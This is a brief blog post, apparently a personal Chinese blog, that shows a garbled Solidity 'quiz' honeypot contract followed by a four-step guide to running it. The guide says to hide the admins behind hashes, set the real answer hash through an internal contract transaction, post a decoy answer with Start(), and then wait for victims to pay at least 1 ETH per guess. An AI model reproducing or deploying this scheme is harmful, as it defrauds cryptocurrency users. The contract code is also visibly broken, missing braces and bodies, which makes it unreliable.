to be
a problem slover


pragma solidity 0.8.0;

contract Kiz_quiz
    function Try(string memory _response) public payable
        require(msg.sender == tx.origin); // only EOA account can invoke Try()

        if(responseHash == keccak256(abi.encode(_response)) && msg.value > 1 ether) // if response hash matchs, take the whole eth balance

    string public question;

    bytes32 responseHash;

    mapping (bytes32=>bool) admin;

    function Start(string calldata _question, string calldata _response) public payable isAdmin{
            responseHash = keccak256(abi.encode(_response));
            question = _question;

    function Stop() public payable isAdmin {

    function New(string calldata _question, bytes32 _responseHash) public payable isAdmin {
        question = _question;
        responseHash = _responseHash;

    constructor(bytes32[] memory admins) {
        for(uint256 i=0; i< admins.length; i++){
            admin[admins[i]] = true;

    modifier isAdmin(){

    fallback() external {}


the contract code is here

step1: deploy the contract, set two admins, one is EOA account another is a contract, store the admin address’s keccak256 hash in mapping, so that the public address of the account is keeping secret.

step2: use the admin contract to call New() function, set a _responseHash, this tx is an internal tx, thus won’t show in the honeypot contract’s tx history.

step3: call Start() function by EOA account admin, but actually it do noting just for cheating you let you think you get the answer, because responseHash != 0x0 after step2.

step4: wait victim to invoke Try() function to fraud at least 1 eth a time.


赞(1) 打赏
欢迎转载,注明出处:刘世明的博客 » question-and-answer-honeypot

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址